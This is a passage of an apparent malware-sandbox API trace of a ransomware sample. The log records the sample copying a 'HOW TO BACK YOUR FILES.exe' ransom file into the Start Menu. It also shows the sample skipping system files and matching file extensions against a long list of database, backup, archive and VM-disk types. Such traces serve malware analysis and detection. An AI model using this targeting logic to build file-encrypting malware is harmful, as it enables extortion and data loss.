lpMem=0x2d2540 | out: hHeap=0x2b0000) returned 1 [0067.560] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools") returned 59 [0067.560] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools" | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools" [0067.560] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.560] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0067.567] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0067.572] GetLastError () returned 0x0 [0067.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0067.572] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0067.579] CloseHandle (hObject=0x120) returned 1 [0067.579] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0067.580] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.580] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4bbcba20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bbcba20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0067.580] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.583] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0067.583] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.587] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4bbcba20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bbcba20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.587] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.588] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0067.588] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.588] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.588] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x898d4524, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x898d4524, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8d692035, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Component Services.lnk", cAlternateFileName="COMPON~1.LNK")) returned 1 [0067.588] lstrcmpiW (lpString1="Component Services.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.588] lstrcmpiW (lpString1="Component Services.lnk", lpString2="aoldtz.exe") returned 1 [0067.588] lstrcmpiW (lpString1="Component Services.lnk", lpString2=".") returned 1 [0067.588] lstrcmpiW (lpString1="Component Services.lnk", lpString2="..") returned 1 [0067.588] lstrcmpiW (lpString1="Component Services.lnk", lpString2="windows") returned -1 [0067.588] lstrcmpiW (lpString1="Component Services.lnk", lpString2="bootmgr") returned 1 [0067.588] lstrcmpiW (lpString1="Component Services.lnk", lpString2="temp") returned -1 [0067.591] lstrcmpiW (lpString1="Component Services.lnk", lpString2="pagefile.sys") returned -1 [0067.591] lstrcmpiW (lpString1="Component Services.lnk", lpString2="boot") returned 1 [0067.591] lstrcmpiW (lpString1="Component Services.lnk", lpString2="ids.txt") returned -1 [0067.594] lstrcmpiW (lpString1="Component Services.lnk", lpString2="ntuser.dat") returned -1 [0067.594] lstrcmpiW (lpString1="Component Services.lnk", lpString2="perflogs") returned -1 [0067.594] lstrcmpiW (lpString1="Component Services.lnk", lpString2="MSBuild") returned -1 [0067.594] lstrlenW (lpString="Component Services.lnk") returned 22 [0067.594] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\*") returned 61 [0067.594] lstrcpyW (in: lpString1=0x2cce478, lpString2="Component Services.lnk" | out: lpString1="Component Services.lnk") returned="Component Services.lnk" [0067.595] lstrlenW (lpString="Component Services.lnk") returned 22 [0067.600] lstrlenW (lpString="Ares865") returned 7 [0067.600] lstrcmpiW (lpString1="ces.lnk", lpString2="Ares865") returned 1 [0067.600] lstrlenW (lpString=".dll") returned 4 [0067.600] lstrcmpiW (lpString1="Component Services.lnk", lpString2=".dll") returned 1 [0067.600] lstrlenW (lpString=".lnk") returned 4 [0067.601] lstrcmpiW (lpString1="Component Services.lnk", lpString2=".lnk") returned 1 [0067.601] lstrlenW (lpString=".ini") returned 4 [0067.601] lstrcmpiW (lpString1="Component Services.lnk", lpString2=".ini") returned 1 [0067.601] lstrlenW (lpString=".sys") returned 4 [0067.601] lstrcmpiW (lpString1="Component Services.lnk", lpString2=".sys") returned 1 [0067.601] lstrlenW (lpString="Component Services.lnk") returned 22 [0067.601] lstrlenW (lpString="bak") returned 3 [0067.601] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0067.606] lstrlenW (lpString="ba_") returned 3 [0067.606] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0067.607] lstrlenW (lpString="dbb") returned 3 [0067.608] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0067.608] lstrlenW (lpString="vmdk") returned 4 [0067.608] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0067.608] lstrlenW (lpString="rar") returned 3 [0067.608] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0067.608] lstrlenW (lpString="zip") returned 3 [0067.608] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0067.608] lstrlenW (lpString="tgz") returned 3 [0067.612] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0067.612] lstrlenW (lpString="vbox") returned 4 [0067.612] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0067.612] lstrlenW (lpString="vdi") returned 3 [0067.612] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0067.612] lstrlenW (lpString="vhd") returned 3 [0067.613] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0067.613] lstrlenW (lpString="vhdx") returned 4 [0067.615] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0067.618] lstrlenW (lpString="avhd") returned 4 [0067.618] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0067.618] lstrlenW (lpString="db") returned 2 [0067.618] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0067.618] lstrlenW (lpString="db2") returned 3 [0067.619] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0067.619] lstrlenW (lpString="db3") returned 3 [0067.619] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0067.619] lstrlenW (lpString="dbf") returned 3 [0067.619] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0067.619] lstrlenW (lpString="mdf") returned 3 [0067.619] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0067.623] lstrlenW (lpString="mdb") returned 3 [0067.623] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0067.623] lstrlenW (lpString="sql") returned 3 [0067.624] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0067.624] lstrlenW (lpString="sqlite") returned 6 [0067.624] lstrcmpiW (lpString1="es.lnk", lpString2="sqlite") returned -1 [0067.625] lstrlenW (lpString="sqlite3") returned 7 [0067.625] lstrcmpiW (lpString1="ces.lnk", lpString2="sqlite3") returned -1 [0067.625] lstrlenW (lpString="sqlitedb") returned 8 [0067.625] lstrcmpiW (lpString1="ices.lnk", lpString2="sqlitedb") returned -1 [0067.625] lstrlenW (lpString="xml") returned 3 [0067.625] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0067.625] lstrlenW (lpString="$er") returned 3 [0067.629] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0067.629] lstrlenW (lpString="4dd") returned 3 [0067.629] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0067.629] lstrlenW (lpString="4dl") returned 3 [0067.630] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0067.630] lstrlenW (lpString="^^^") returned 3 [0067.630] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0067.630] lstrlenW (lpString="abs") returned 3 [0067.630] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0067.630] lstrlenW (lpString="abx") returned 3 [0067.630] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0067.632] lstrlenW (lpString="accdb") returned 5 [0067.633] lstrcmpiW (lpString1="s.lnk", lpString2="accdb") returned 1 [0067.635] lstrlenW (lpString="accdc") returned 5 [0067.635] lstrcmpiW (lpString1="s.lnk", lpString2="accdc") returned 1 [0067.636] lstrlenW (lpString="accde") returned 5 [0067.636] lstrcmpiW (lpString1="s.lnk", lpString2="accde") returned 1 [0067.636] lstrlenW (lpString="accdr") returned 5 [0067.636] lstrcmpiW (lpString1="s.lnk", lpString2="accdr") returned 1 [0067.637] lstrlenW (lpString="accdt") returned 5 [0067.637] lstrcmpiW (lpString1="s.lnk", lpString2="accdt") returned 1 [0067.637] lstrlenW (lpString="accdw") returned 5 [0067.637] lstrcmpiW (lpString1="s.lnk", lpString2="accdw") returned 1 [0067.640] lstrlenW (lpString="accft") returned 5 [0067.640] lstrcmpiW (lpString1="s.lnk", lpString2="accft") returned 1 [0067.640] lstrlenW (lpString="adb") returned 3 [0067.641] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.642] lstrlenW (lpString="adb") returned 3 [0067.642] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.642] lstrlenW (lpString="ade") returned 3 [0067.642] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0067.642] lstrlenW (lpString="adf") returned 3 [0067.642] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0067.642] lstrlenW (lpString="adn") returned 3 [0067.644] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0067.644] lstrlenW (lpString="adp") returned 3 [0067.644] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0067.644] lstrlenW (lpString="alf") returned 3 [0067.647] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0067.647] lstrlenW (lpString="ask") returned 3 [0067.647] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0067.648] lstrlenW (lpString="btr") returned 3 [0067.648] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0067.648] lstrlenW (lpString="cat") returned 3 [0067.648] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0067.648] lstrlenW (lpString="cdb") returned 3 [0067.648] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0067.648] lstrlenW (lpString="ckp") returned 3 [0067.648] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0067.648] lstrlenW (lpString="cma") returned 3 [0067.648] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0067.648] lstrlenW (lpString="cpd") returned 3 [0067.658] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0067.658] lstrlenW (lpString="dacpac") returned 6 [0067.659] lstrcmpiW (lpString1="es.lnk", lpString2="dacpac") returned 1 [0067.659] lstrlenW (lpString="dad") returned 3 [0067.660] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0067.660] lstrlenW (lpString="dadiagrams") returned 10 [0067.660] lstrcmpiW (lpString1="rvices.lnk", lpString2="dadiagrams") returned 1 [0067.660] lstrlenW (lpString="daschema") returned 8 [0067.660] lstrcmpiW (lpString1="ices.lnk", lpString2="daschema") returned 1 [0067.660] lstrlenW (lpString="db-journal") returned 10 [0067.660] lstrcmpiW (lpString1="rvices.lnk", lpString2="db-journal") returned 1 [0067.664] lstrlenW (lpString="db-shm") returned 6 [0067.664] lstrcmpiW (lpString1="es.lnk", lpString2="db-shm") returned 1 [0067.664] lstrlenW (lpString="db-wal") returned 6 [0067.665] lstrcmpiW (lpString1="es.lnk", lpString2="db-wal") returned 1 [0067.665] lstrlenW (lpString="dbc") returned 3 [0067.671] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0067.671] lstrlenW (lpString="dbs") returned 3 [0067.671] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0067.671] lstrlenW (lpString="dbt") returned 3 [0067.671] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0067.671] lstrlenW (lpString="dbv") returned 3 [0067.671] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0067.676] lstrlenW (lpString="dbx") returned 3 [0067.677] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0067.677] lstrlenW (lpString="dcb") returned 3 [0067.678] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0067.678] lstrlenW (lpString="dct") returned 3 [0067.678] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0067.678] lstrlenW (lpString="dcx") returned 3 [0067.678] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0067.678] lstrlenW (lpString="ddl") returned 3 [0067.678] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0067.678] lstrlenW (lpString="dlis") returned 4 [0067.682] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0067.682] lstrlenW (lpString="dp1") returned 3 [0067.685] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0067.685] lstrlenW (lpString="dqy") returned 3 [0067.685] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0067.688] lstrlenW (lpString="dsk") returned 3 [0067.688] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0067.689] lstrlenW (lpString="dsn") returned 3 [0067.689] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0067.689] lstrlenW (lpString="dtsx") returned 4 [0067.689] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0067.689] lstrlenW (lpString="dxl") returned 3 [0067.690] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0067.690] lstrlenW (lpString="eco") returned 3 [0067.690] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0067.694] lstrlenW (lpString="ecx") returned 3 [0067.694] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0067.694] lstrlenW (lpString="edb") returned 3 [0067.696] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0067.697] lstrlenW (lpString="epim") returned 4 [0067.697] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0067.697] lstrlenW (lpString="fcd") returned 3 [0067.697] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0067.697] lstrlenW (lpString="fdb") returned 3 [0067.702] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0067.702] lstrlenW (lpString="fic") returned 3 [0067.703] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0067.703] lstrlenW (lpString="flexolibrary") returned 12 [0067.703] lstrcmpiW (lpString1="Services.lnk", lpString2="flexolibrary") returned 1 [0067.703] lstrlenW (lpString="fm5") returned 3 [0067.703] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0067.704] lstrlenW (lpString="fmp") returned 3 [0067.704] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0067.704] lstrlenW (lpString="fmp12") returned 5 [0067.704] lstrcmpiW (lpString1="s.lnk", lpString2="fmp12") returned 1 [0067.705] lstrlenW (lpString="fmpsl") returned 5 [0067.705] lstrcmpiW (lpString1="s.lnk", lpString2="fmpsl") returned 1 [0067.705] lstrlenW (lpString="fol") returned 3 [0067.705] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0067.705] lstrlenW (lpString="fp3") returned 3 [0067.706] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0067.706] lstrlenW (lpString="fp4") returned 3 [0067.710] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0067.710] lstrlenW (lpString="fp5") returned 3 [0067.710] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0067.724] lstrlenW (lpString="fp7") returned 3 [0067.724] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0067.724] lstrlenW (lpString="fpt") returned 3 [0067.724] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0067.727] lstrlenW (lpString="frm") returned 3 [0067.727] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0067.727] lstrlenW (lpString="gdb") returned 3 [0067.727] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0067.727] lstrlenW (lpString="gdb") returned 3 [0067.727] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0067.727] lstrlenW (lpString="grdb") returned 4 [0067.727] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0067.727] lstrlenW (lpString="gwi") returned 3 [0067.732] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0067.732] lstrlenW (lpString="hdb") returned 3 [0067.732] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0067.732] lstrlenW (lpString="his") returned 3 [0067.732] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0067.733] lstrlenW (lpString="ib") returned 2 [0067.733] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0067.733] lstrlenW (lpString="idb") returned 3 [0067.733] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0067.733] lstrlenW (lpString="ihx") returned 3 [0067.733] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0067.734] lstrlenW (lpString="itdb") returned 4 [0067.734] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0067.734] lstrlenW (lpString="itw") returned 3 [0067.736] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0067.736] lstrlenW (lpString="jet") returned 3 [0067.736] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0067.738] lstrlenW (lpString="jtx") returned 3 [0067.738] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0067.738] lstrlenW (lpString="kdb") returned 3 [0067.739] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0067.739] lstrlenW (lpString="kexi") returned 4 [0067.739] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0067.740] lstrlenW (lpString="kexic") returned 5 [0067.740] lstrcmpiW (lpString1="s.lnk", lpString2="kexic") returned 1 [0067.740] lstrlenW (lpString="kexis") returned 5 [0067.740] lstrcmpiW (lpString1="s.lnk", lpString2="kexis") returned 1 [0067.740] lstrlenW (lpString="lgc") returned 3 [0067.740] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0067.740] lstrlenW (lpString="lwx") returned 3 [0067.740] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0067.740] lstrlenW (lpString="maf") returned 3 [0067.740] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0067.740] lstrlenW (lpString="maq") returned 3 [0067.740] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0067.740] lstrlenW (lpString="mar") returned 3 [0067.740] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0067.741] lstrlenW (lpString="marshal") returned 7 [0067.741] lstrcmpiW (lpString1="ces.lnk", lpString2="marshal") returned -1 [0067.741] lstrlenW (lpString="mas") returned 3 [0067.741] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0067.741] lstrlenW (lpString="mav") returned 3 [0067.747] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0067.747] lstrlenW (lpString="maw") returned 3 [0067.747] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0067.748] lstrlenW (lpString="mdbhtml") returned 7 [0067.748] lstrcmpiW (lpString1="ces.lnk", lpString2="mdbhtml") returned -1 [0067.748] lstrlenW (lpString="mdn") returned 3 [0067.748] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0067.751] lstrlenW (lpString="mdt") returned 3 [0067.751] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0067.751] lstrlenW (lpString="mfd") returned 3 [0067.756] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0067.756] lstrlenW (lpString="mpd") returned 3 [0067.756] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0067.756] lstrlenW (lpString="mrg") returned 3 [0067.757] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0067.757] lstrlenW (lpString="mud") returned 3 [0067.757] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0067.757] lstrlenW (lpString="mwb") returned 3 [0067.757] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0067.757] lstrlenW (lpString="myd") returned 3 [0067.757] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0067.757] lstrlenW (lpString="ndf") returned 3 [0067.757] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0067.760] lstrlenW (lpString="nnt") returned 3 [0067.760] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0067.763] lstrlenW (lpString="nrmlib") returned 6 [0067.763] lstrcmpiW (lpString1="es.lnk", lpString2="nrmlib") returned -1 [0067.763] lstrlenW (lpString="ns2") returned 3 [0067.763] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0067.763] lstrlenW (lpString="ns3") returned 3 [0067.763] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0067.764] lstrlenW (lpString="ns4") returned 3 [0067.764] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0067.764] lstrlenW (lpString="nsf") returned 3 [0067.764] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0067.764] lstrlenW (lpString="nv") returned 2 [0067.764] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0067.764] lstrlenW (lpString="nv2") returned 3 [0067.764] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0067.764] lstrlenW (lpString="nwdb") returned 4 [0067.764] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0067.767] lstrlenW (lpString="nyf") returned 3 [0067.767] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0067.769] lstrlenW (lpString="odb") returned 3 [0067.769] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0067.769] lstrlenW (lpString="odb") returned 3 [0067.769] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0067.770] lstrlenW (lpString="oqy") returned 3 [0067.770] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0067.771] lstrlenW (lpString="ora") returned 3 [0067.771] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0067.771] lstrlenW (lpString="orx") returned 3 [0067.771] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0067.771] lstrlenW (lpString="owc") returned 3 [0067.771] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0067.771] lstrlenW (lpString="p96") returned 3 [0067.773] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0067.773] lstrlenW (lpString="p97") returned 3 [0067.773] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0067.776] lstrlenW (lpString="pan") returned 3 [0067.777] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0067.777] lstrlenW (lpString="pdb") returned 3 [0067.777] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0067.777] lstrlenW (lpString="pdm") returned 3 [0067.777] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0067.777] lstrlenW (lpString="pnz") returned 3 [0067.778] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0067.781] lstrlenW (lpString="qry") returned 3 [0067.785] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0067.785] lstrlenW (lpString="qvd") returned 3 [0067.785] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0067.785] lstrlenW (lpString="rbf") returned 3 [0067.786] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0067.786] lstrlenW (lpString="rctd") returned 4 [0067.786] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0067.786] lstrlenW (lpString="rod") returned 3 [0067.786] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0067.786] lstrlenW (lpString="rodx") returned 4 [0067.786] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0067.786] lstrlenW (lpString="rpd") returned 3 [0067.786] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0067.786] lstrlenW (lpString="rsd") returned 3 [0067.786] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0067.792] lstrlenW (lpString="sas7bdat") returned 8 [0067.793] lstrcmpiW (lpString1="ices.lnk", lpString2="sas7bdat") returned -1 [0067.793] lstrlenW (lpString="sbf") returned 3 [0067.793] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0067.793] lstrlenW (lpString="scx") returned 3 [0067.793] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0067.793] lstrlenW (lpString="sdb") returned 3 [0067.793] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0067.793] lstrlenW (lpString="sdc") returned 3 [0067.793] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0067.793] lstrlenW (lpString="sdf") returned 3 [0067.793] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0067.794] lstrlenW (lpString="sis") returned 3 [0067.794] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0067.794] lstrlenW (lpString="spq") returned 3 [0067.794] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0067.794] lstrlenW (lpString="te") returned 2 [0067.794] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0067.794] lstrlenW (lpString="teacher") returned 7 [0067.797] lstrcmpiW (lpString1="ces.lnk", lpString2="teacher") returned -1 [0067.797] lstrlenW (lpString="tmd") returned 3 [0067.797] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0067.797] lstrlenW (lpString="tps") returned 3 [0067.798] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0067.798] lstrlenW (lpString="trc") returned 3 [0067.800] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0067.800] lstrlenW (lpString="trc") returned 3 [0067.800] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0067.801] lstrlenW (lpString="trm") returned 3 [0067.801] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0067.801] lstrlenW (lpString="udb") returned 3 [0067.801] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0067.803] lstrlenW (lpString="udl") returned 3 [0067.803] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0067.806] lstrlenW (lpString="usr") returned 3 [0067.806] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0067.806] lstrlenW (lpString="v12") returned 3 [0067.807] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0067.807] lstrlenW (lpString="vis") returned 3 [0067.807] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0067.807] lstrlenW (lpString="vpd") returned 3 [0067.810] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0067.812] lstrlenW (lpString="vvv") returned 3 [0067.812] lstrcmpiW (lpString1="lnk", 